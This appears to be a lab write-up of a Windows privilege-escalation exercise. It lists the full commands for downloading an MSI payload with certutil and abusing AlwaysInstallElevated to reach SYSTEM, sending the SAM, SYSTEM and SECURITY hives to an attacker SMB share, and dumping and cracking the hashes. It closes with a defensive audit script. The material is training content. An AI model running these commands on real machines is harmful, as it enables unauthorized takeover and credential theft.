# Brief

- As part of an assumed breach assessment, you have been granted a standard user account with RDP access to a clone of a standard user Windows 10 workstation with no internet access
- The client wants as comprehensive an assessment as possible, so Defender has been disabled
- No internet access from foothold host, so you will need to transfer any tools over yourself.
- Enumerate the host fully and attempt to escalate privileges to administrator/SYSTEM level access

---

# External Enum

- `ping` test
![[images/Pasted image 20260301114620.png]]
- `nmap` scan - light
![[images/Pasted image 20260301114712.png]]
- NOTE: Microsoft Windows 10 1709 - 21H2
![[images/Pasted image 20260301115127.png]]
- `nmap` scan - detailed
![[images/Pasted image 20260301115208.png]]
- `nxc smb` scan
![[images/Pasted image 20260301115331.png]]

---

# Internal Enum

- `rdp` connect to target with given creds for low-privileged user
- look at user's home directory
![[images/Pasted image 20260301115756.png]]
- `systeminfo` output - WIN 10.0.18363
![[images/Pasted image 20260301115924.png]]
- KBs and NICs
![[images/Pasted image 20260301115938.png]]
- active connections
![[images/Pasted image 20260301120324.png]]
- installed programs
![[images/Pasted image 20260301120300.png]]
- `wmic qfe` output
![[images/Pasted image 20260301120024.png]]
- `whoami /all` output > no interesting groups or privs
![[images/Pasted image 20260301120116.png]]
- all users, groups, and password policy
![[images/Pasted image 20260301120414.png]]
- drill down on the `wksadmin` account
![[images/Pasted image 20260301120458.png]]

---

# Search for cleartext creds

- move `lazagne.exe` to target and execute - nothing
![[images/Pasted image 20260301121846.png]]
- no chrome dictionary files
- no `plum.sqlite` db for stickynotes
- use `get-childitem` cmdlet to search on `iamtheadministrator` > nothing
![[images/Pasted image 20260301121212.png]]

```powershell
get-childitem -Path "C:\" -Filter "iamtheadministrator" -Recurse 2>$null
```

- look for files containing "password"
![[images/Pasted image 20260301121403.png]]
- `Console_history.txt` looks interesting > nvm, it's just what we've typed so far
![[images/Pasted image 20260301121505.png]]

```powershell
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml 2>$null
```

- try a different `findstr` command from `c:\`
![[images/Pasted image 20260301122730.png]]
- `unattend.xml` looks interesting > password for `iamtheadministrator` leaked

```powershell
findstr /spin "iamtheadmin" *.* 2>$null
```

---

# Privesc

- creds for `iamtheadministrator` do not work with `nxc smb` and `rdp`
- move `winpeas.exe` to target and execute - the output is super nasty looking > skip this

## Exploit `AlwaysInstallElevated`

- enumerate `AlwaysInstallElevated` - looks like it is enabled
![[images/Pasted image 20260301124801.png]]
- create and host payload, then open listener
![[images/Pasted image 20260301124922.png]]
- download on target and run - appears to be getting deleted > I thought Defender was supposed to be off
![[images/Pasted image 20260301125344.png]]

```powershell
iwr http://10.10.15.203:8000/aie.msi -usebasicparsing
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
```

- AMSI and AV are enabled > wtf, the brief said it was supposed to be disabled
![[images/Pasted image 20260301125716.png]]
- try to move `aie.msi` with `certutil` > that worked!!
![[images/Pasted image 20260301130901.png]]

```powershell
certutil.exe -urlcache -split -f http://10.10.15.203:8000/aie.msi aie.msi
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
```

- we have a hit on our listener - we are `SYSTEM`!
![[images/Pasted image 20260301131001.png]]

---

## Exfil SAM, SYSTEM, SECURITY hives

- stand up `smbserver` on Kali to receive exfiltrated hives

```bash
sudo impacket-smbserver share -smb2support .
```

![[images/Pasted image 20260301151619.png]]
- make local copies of SAM, SYSTEM, and SECURITY hives on target

```cmd
reg.exe save hklm\sam .\sam.save
reg.exe save hklm\system .\system.save
reg.exe save hklm\security .\security.save
```

![[images/Pasted image 20260301151856.png]]
- push hives to Kali's `smbserver`

```cmd
move sam.save \\10.10.15.203\share
move security.save \\10.10.15.203\share
move system.save \\10.10.15.203\share
```

![[images/Pasted image 20260301151946.png]]
- extract password hashes using `secretsdump.py`

```bash
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```

![[images/Pasted image 20260301152304.png]]
- crack hash for `wksadmin` using mode 1000 for NTLM hashes
- NOTE: only use the `nthash` portion of `lmhash:nthash`

```bash
sudo hashcat -m 1000 hash /opt/rockyou.txt
```

![[images/Pasted image 20260301152638.png]]
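Remediation check for the two findings that gave up this box (the `AlwaysInstallElevated` policy and the leftover `unattend.xml`), added here as a defender-side script and not part of the original notes. It assumes the standard sysprep answer-file locations listed in `$unattendPaths`; the policy itself only takes effect when the value is `1` under both `HKLM` and `HKCU`, which is what the check reports.

```powershell
# Added audit helper (not from the original writeup). Reports whether the
# AlwaysInstallElevated policy is fully enabled, can clear it, and lists
# leftover sysprep answer files that may still carry a local admin password.

$keyPath = 'Software\Policies\Microsoft\Windows\Installer'
$hives   = @{ HKLM = "HKLM:\$keyPath"; HKCU = "HKCU:\$keyPath" }

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($h in $hives.Keys) {
        $v = Get-ItemProperty -Path $hives[$h] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$h] = if ($null -ne $v) { [int]$v.AlwaysInstallElevated } else { 0 }
    }
    # Windows Installer only honours the policy when BOTH values are 1.
    $state['Exploitable'] = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    return [pscustomobject]$state
}

function Disable-AlwaysInstallElevated {
    # Needs an elevated prompt for the HKLM half; HKCU can be fixed per user.
    foreach ($h in $hives.Keys) {
        if (Test-Path $hives[$h]) {
            Set-ItemProperty -Path $hives[$h] -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

# Assumed list of the usual answer-file locations left behind after imaging.
$unattendPaths = @(
    "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml",
    "$env:SystemRoot\System32\Sysprep\Unattend.xml",
    "$env:SystemRoot\System32\Sysprep\sysprep.xml"
)

function Get-LeftoverUnattendFiles {
    $unattendPaths | Where-Object { Test-Path $_ } | ForEach-Object {
        $raw = Get-Content $_ -Raw
        [pscustomobject]@{
            Path        = $_
            HasPassword = [bool]($raw -match '<Password>')
            PlainText   = [bool]($raw -match '<PlainText>true</PlainText>')
        }
    }
}

$aie = Get-AlwaysInstallElevatedState
$aie | Format-List
if ($aie.Exploitable) { Write-Warning 'AlwaysInstallElevated is enabled in both hives; clear it with Disable-AlwaysInstallElevated.' }
Get-LeftoverUnattendFiles | Format-Table -AutoSize
```

Any answer file reported with `HasPassword` set should be deleted or have its `<Password>` block stripped, whether or not the value is marked plain text, since the base64 form is trivially decoded.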